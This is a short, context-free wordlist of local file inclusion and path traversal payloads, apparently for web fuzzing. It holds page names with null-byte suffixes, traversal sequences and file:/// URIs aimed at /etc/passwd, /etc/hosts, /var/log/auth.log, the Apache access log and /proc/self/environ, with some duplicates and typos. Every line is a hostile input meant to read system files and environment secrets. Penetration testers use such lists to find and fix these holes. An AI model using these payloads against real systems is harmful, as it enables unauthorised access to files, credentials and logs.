index
html
home
page
incliude
web
index.php%00
html.php%00
home.php%00
page.php%00
incliude.php%00
web.php&00
/etc/passwd
/var/log/auth
../etc/passwd
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
....//....//....//....//var//log//auth
....//....//....//....//var//log//auth.log
....//....//....//....//....//etc//passwd
file:///auth.log
file:///auth
file:///index
file:///index.php
file:///etc/passwd
file:///etc/hosts
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../../../../../../../var/log/apache2/access.log
..//..//..//..//..//..//..//var//log//apache2//access.log
file:////var/log/apache2/access.log
file:///proc/self/environ
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
